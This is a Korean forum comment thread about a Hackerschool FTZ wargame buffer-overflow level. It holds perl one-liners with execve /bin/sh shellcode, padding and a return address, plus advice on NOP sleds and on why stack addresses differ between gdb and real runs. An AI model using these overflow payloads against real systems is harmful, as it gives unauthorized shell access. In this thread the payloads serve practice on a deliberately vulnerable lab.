|  |
| |
| W.H. |
잘못된 명령어라 나오는걸 보니까... 쉘코드에 이상이 잇는것 같네요
보통 공격이 통하지 않으면 세그먼트 폴트나 컨텍스트 에런가?
하여간 변조된 sfp 값때문에 문법에러나 변조된 ret 에러땜시 세그먼프 폴트가 뜹니다
잘못된 명령어라 뜨는 경우는 처음 봤는데 아마 쉘코드를 제대로 가리키고 있지 못하거나 쉘코드가 잘못된것 같네요
쉘코드 앞에 \x90(NOP) 좀 넣어서 다시 해보세요 |
2011/07/01 |
|
| W.H. |
이 공격소스 `perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80","A"x243,"\x10\xf9\xff\xbf"'`
를
`perl -e 'print "\x200","\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80","A"x43,"\x10\xf9\xff\xbf"'`
으로 바꿔서 해보세요 |
2011/07/01 |
|
| W.H. |
아 또 댓글쓰네;;
bash2 꼭 실행하시고요 그리고 저거 실행해보니 그런 파일이 없다고 뜨는데 아무래도 쉘코드가 이상한것 같네요 한번 다른 쉘코드 구해다 써보세요 |
2011/07/01 |
|
| ozdang |
앞에 NOP 처리를 하니까 되긴 되네요..
해커스쿨 ftz는 논랜덤스택이라고 알고 있는데
왜 gdb와 차이가 나는지 모르겠네요...--; |
2011/07/02 |
|
| ozdang |
gdb와 실제 실행할 때 스택하고 다르게 나올 수 도 있군요 --;;;
환경변수를 이용해서 하는게 편하다는걸 알았습니다... |
2011/07/02 |
|
| milkily |
혹시요 버젼업 되면서 랜덤 쓰래기 값이 생겻다고 문서를 본거같은데? 제가 지금 쓴 말이 지금 질묺신내용하고 상통하고잇는건가요? 문서란 문서 다보다가. 이젠 뭐가 뭔지 해깔리는지경이네요 |
2011/10/12 |
|